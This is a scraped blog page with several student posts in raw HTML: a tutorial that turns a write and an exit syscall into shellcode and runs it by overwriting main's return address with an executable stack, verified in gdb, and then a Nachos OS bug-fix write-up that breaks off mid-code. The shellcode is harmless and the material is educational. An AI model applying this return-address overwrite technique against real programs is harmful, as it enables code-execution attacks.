<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xba</span><span style="color: #0f69ff;">\x07</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf1</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xdb</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ptr<span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> i<span style="color: #406080;">;</span>
<span style="color: #595979;">/*</span>
<span style="color: #595979;"> *overflow the return address.</span>
<span style="color: #595979;"> *transfer the execution flow to shellcode.</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">for</span><span style="color: #308080;">(</span>i<span style="color: #308080;">=</span><span style="color: #008c00;">0</span><span style="color: #406080;">;</span>i<span style="color: #308080;"><</span><span style="color: #008c00;">10</span><span style="color: #406080;">;</span>i<span style="color: #308080;">+</span><span style="color: #308080;">+</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
ptr <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ptr<span style="color: #308080;">+</span>i<span style="color: #406080;">;</span>
<span style="color: #308080;">*</span><span style="color: #308080;">(</span>ptr<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">compile the program and don't forget to use the execstack command to enable the executable stack.</span></span><br />
<span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">demo video:</span></span><br />
<a href="http://www.youtube.com/watch?v=WpfShXa1iEk"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">http://www.youtube.com/watch?v=WpfShXa1iEk</span></span></a></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></span></div><br />
<br />
</div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-71072057833026713042011-06-29T09:43:00.000-07:002011-11-02T06:57:38.673-07:00Shell code 2 (cont.)After the previous article, I wrote a program which use a shell code to exit normally.<br />
However, there is a more simple way to accomplish this job. We can use the linux system call.<br />
<br />
In linux, when you want to use a system call in assembly, just use the int $0x80.<br />
The system call number is store in the %eax, and the parameter of the system call is store in the %ebx and so on.<br />
<br />
Ok, it's time to use these information and write them into shell code.<br />
<br />
First write a normal program and use inline assembly in the program.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">exit.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: maroon; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: purple;">{</span>
__asm__<span style="color: #808030;">(</span><span style="color: maroon;">"</span><span style="color: #0000e6;">movw $1, </span><span style="color: #0f69ff;">%e</span><span style="color: #0000e6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #0000e6;"></span>
<span style="color: #0000e6;"> movw $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #0000e6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #0000e6;"></span>
<span style="color: #0000e6;"> int $0x80;</span><span style="color: maroon;">"</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span></pre><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">and now compile it with the following command.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -static -g -o exit.out exit.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">objdump -d exit.out >> dump.txt</span><br />
<div style="font-family: inherit;"><span class="Apple-style-span">dump.txt main function</span></div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">080482c0 <span style="color: #808030;"><</span>main<span style="color: #808030;">></span><span style="color: #808030;">:</span>
<span style="color: #e34adc;"> 80482c0:</span> <span style="color: #008c00;">55</span> <span style="color: maroon; font-weight: bold;">push</span> <span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: #e34adc;"> 80482c1:</span> <span style="color: #008c00;">89</span> <span style="color: #38761d;">e5</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">esp</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: #e34adc;"> 80482c3:</span> <span style="color: #38761d;">b8</span> <span style="color: #008c00;">01</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x1</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: #e34adc;"> 80482c8:</span> <span style="color: #38761d;">bb</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebx</span>
<span style="color: #e34adc;"> 80482cd:</span> <span style="color: #38761d;">cd</span> <span style="color: #008c00;">80</span> <span style="color: maroon; font-weight: bold;">int</span> $<span style="color: green;">0x80</span>
<span style="color: #e34adc;"> 80482cf:</span> <span style="color: #38761d;">b8</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: #e34adc;"> 80482d4:</span> <span style="color: #008c00;">5d</span> <span style="color: maroon; font-weight: bold;">pop</span> <span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: #e34adc;"> 80482d5:</span> <span style="color: #38761d;">c3</span> <span style="color: maroon; font-weight: bold;">ret</span></pre>the machine code part is what we need.<br />
Let's change them into shell code.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">exit_shell.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: maroon; font-weight: bold;">char</span> shellcode<span style="color: #808030;">[</span><span style="color: #808030;">]</span><span style="color: #808030;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">int</span> <span style="color: #808030;">*</span>ptr<span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">int</span> i<span style="color: purple;">;</span>
<span style="color: maroon;">for</span><span style="color: #808030;">(</span>i<span style="color: #808030;">=</span><span style="color: #008c00;">0</span><span style="color: purple;">;</span>i<span style="color: #808030;"><</span><span style="color: #008c00;">10</span><span style="color: purple;">;</span>i<span style="color: #808030;">+</span><span style="color: #808030;">+</span><span style="color: #808030;">)</span><span style="color: purple;">{</span>
ptr <span style="color: #808030;">=</span> <span style="color: #808030;">(</span><span style="color: maroon;">int</span><span style="color: #808030;">*</span><span style="color: #808030;">)</span><span style="color: #808030;">&</span>ptr<span style="color: #808030;">+</span>i<span style="color: purple;">;</span>
<span style="color: #808030;">*</span><span style="color: #808030;">(</span>ptr<span style="color: #808030;">)</span> <span style="color: #808030;">=</span> <span style="color: #808030;">(</span><span style="color: maroon;">int</span><span style="color: #808030;">)</span>shellcode<span style="color: purple;">;</span>
<span style="color: purple;">}</span>
<span style="color: maroon; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span></pre><div style="font-family: inherit;"><span class="Apple-style-span">P.S The for loop is to overflow the return address and transfer the execution flow to the shellcode.</span></div>compile it with the following and remember to use the execstack to enable the executable stack.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -static -g -o exit_shell.out exit_shell.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execstack -s exit_shell.out</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Result:</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;">now use gdb to verify our thoughts.</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> disassem main
Dump of assembler <span style="color: #004a43;">code</span> <span style="color: #004a43;">for</span> function main<span style="color: #808030;">:</span>
<span style="color: green;">0x080482c0</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+0</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">push</span> <span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: green;">0x080482c1</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+1</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">esp</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: green;">0x080482c3</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+3</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">sub</span> $<span style="color: green;">0x10</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">esp</span>
<span style="color: green;">0x080482c6</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+6</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> movl $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482cd</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+13</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">jmp</span> <span style="color: #e34adc;">0x80482eb</span> <span style="color: #808030;"><</span>main<span style="color: #808030;">+</span><span style="color: #008c00;">43</span><span style="color: #808030;">></span>
<span style="color: green;">0x080482cf</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+15</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">lea</span> <span style="color: #808030;">-</span><span style="color: green;">0x4</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482d2</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+18</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">edx</span>
<span style="color: green;">0x080482d5</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+21</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">shl</span> $<span style="color: green;">0x2</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">edx</span>
<span style="color: green;">0x080482d8</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+24</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">add</span> <span style="color: #808030;">%</span><span style="color: navy;">edx</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482da</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+26</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">eax</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x4</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482dd</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+29</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">-</span><span style="color: green;">0x4</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482e0</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+32</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x80ce028</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">edx</span>
<span style="color: green;">0x080482e5</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+37</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">edx</span><span style="color: #808030;">,</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482e7</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+39</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> addl $<span style="color: green;">0x1</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482eb</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+43</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> cmpl $<span style="color: green;">0x9</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
<span style="color: green;">0x080482ef</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+47</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">jle</span> <span style="color: #e34adc;">0x80482cf</span> <span style="color: #808030;"><</span>main<span style="color: #808030;">+</span><span style="color: #008c00;">15</span><span style="color: #808030;">></span>
<span style="color: green;">0x080482f1</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+49</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x080482f6</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+54</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">leave</span>
<span style="color: green;">0x080482f7</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+55</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">ret</span>
<span style="color: #004a43;">End</span> of assembler dump.
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> b <span style="color: #808030;">*</span><span style="color: #808030;">(</span>main<span style="color: #808030;">+</span><span style="color: #008c00;">55</span><span style="color: #808030;">)</span>
Breakpoint <span style="color: #008c00;">1</span> <span style="color: #004a43;">at</span> <span style="color: green;">0x80482f7</span><span style="color: #808030;">:</span> file exit_shell.<span style="color: #004a43;">c</span><span style="color: #808030;">,</span> line <span style="color: #008c00;">12</span>.
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> r
Breakpoint <span style="color: #008c00;">1</span><span style="color: #808030;">,</span> <span style="color: green;">0x080482f7</span> <span style="color: maroon; font-weight: bold;">in</span> main <span style="color: #808030;">(</span><span style="color: #808030;">)</span> <span style="color: #004a43;">at</span> exit_shell.<span style="color: #004a43;">c</span><span style="color: #808030;">:</span><span style="color: #008c00;">12</span>
<span style="color: #008c00;">12</span> <span style="color: #808030;">}</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
<span style="color: green;">0x080ce028</span> <span style="color: maroon; font-weight: bold;">in</span> shellcode <span style="color: #808030;">(</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> x<span style="color: #808030;">/</span>4i $eip
<span style="color: #808030;">=</span><span style="color: #808030;">></span> <span style="color: green;">0x80ce028</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x1</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: green;">0x80ce02d</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">+</span><span style="color: #008c00;">5</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebx</span>
<span style="color: green;">0x80ce032</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">+</span><span style="color: #008c00;">10</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">int</span> $<span style="color: green;">0x80</span>
<span style="color: green;">0x80ce034</span> <span style="color: #808030;"><</span>shellcode<span style="color: #808030;">+</span><span style="color: #008c00;">12</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">add</span> <span style="color: #808030;">%</span><span style="color: navy;">al</span><span style="color: #808030;">,</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
<span style="color: green;">0x080ce02d</span> <span style="color: maroon; font-weight: bold;">in</span> shellcode <span style="color: #808030;">(</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
<span style="color: green;">0x080ce032</span> <span style="color: maroon; font-weight: bold;">in</span> shellcode <span style="color: #808030;">(</span><span style="color: #808030;">)</span>
<span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> ni
Program exited normally.</pre><span class="Apple-style-span" style="font-family: inherit;">The result is just what we expected. When main function returned, it will start execute the shellcode.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">And exited normally.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">video demo is right here (using full screen is better):</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.youtube.com/watch?v=I6iYFQl-3kk&feature=player_embedded#at=14">http://www.youtube.com/watch?v=I6iYFQl-3kk&feature=player_embedded#at=14</a></span><br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-8187114676074626202011-06-29T03:45:00.000-07:002011-06-30T01:18:45.598-07:00nachos (cont.)After building and install the nachos, the second project is to fix a bug in nachos.<br />
<br />
<b>Bug description:</b><br />
When nachos is executing two different executable files, the result will be weird.<br />
The following is picture is how the bug looks like.<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-gQH0WEVYUvg/TgwW1h1vTkI/AAAAAAAAADs/_zQLjcqWgA4/s1600/project2_bug.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="http://1.bp.blogspot.com/-gQH0WEVYUvg/TgwW1h1vTkI/AAAAAAAAADs/_zQLjcqWgA4/s320/project2_bug.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>Finding the Bug:</b><br />
Now I know what the bug looks like, It's time to find out what cause the bug.<br />
Since our TA have told us that the bug may be in the ./userprog/addrspace.h and ./userprog/addrspace.cc, my team mate and I start to understand what this two files are doing.<br />
<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;">what we are interested are </span><br />
<span class="Apple-style-span" style="font-family: inherit;">1. AddrSpace::Load(), which will load the image into the physical addrspace.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">2. AddrSpace::AddrSpace, which is the constructor of this class, and will create the page table of this process.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
In the source code of AddrSpace::Load()<br />
these code is to load the .text and .data into the physical memory<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if (noffH.code.size > 0) {</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> executable->ReadAt(</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&(kernel->machine->mainMemory[<span class="Apple-style-span" style="color: red;">noffH.code.virtualAddr</span>]),</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">noffH.code.size, noffH.code.inFileAddr);</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if (noffH.initData.size > 0) {</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> executable->ReadAt(</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&(kernel->machine->mainMemory[<span class="Apple-style-span" style="color: red;">noffH.initData.virtualAddr</span>]),</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">noffH.initData.size, noffH.initData.inFileAddr);</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">The allocating process will allocate the virtual address space into the physical address space.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">However as the red highlight suggest, the physical address of the process is exactly the same as the virtual address of the process.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">If the second process is allocate into the memory, it will overwrite the previous process. Hence, when the previous process restore the state, it will execute the code of another process, not the one belongs to it.</span><br />
Here, we may find our problem.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">But not so fast, before we modified the code and fixed the bug, there is one thing that we need to be aware.</span>Nachos is using paging to map the virtual address to physical address. Therefore, when we modified the allocating part, we also need to modified the paging (page tables).The mapping of the page table is in the constructor. As the code suggest, the page table is one to one linear mapping. Therefore, if another process is load into the memory, and the process 1 restore the state. The page table of process 1 will tell that the physical address space of process1 in in the old place where it has already been overwritten by process 2.<br />
<span class="Apple-style-span" style="font-family: inherit;"><b><br />
</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Fixed the bug:</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;">Now we have the information we need. It's time to modified the code and fix the bug.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">The method of our team is to add a <b><span class="Apple-style-span" style="color: red;">static unsigned int variable</span> </b>which will<b> <span class="Apple-style-span" style="color: red;">record how many physical frame is being used</span></b>, and when process 2 is load into the memory, it will not overwritten the address space of process 1.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
1. first add a static unsigned int variable in the addrspace.h<br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">addrspace.h</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">class AddrSpace {</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> public:</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> .....</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><br />
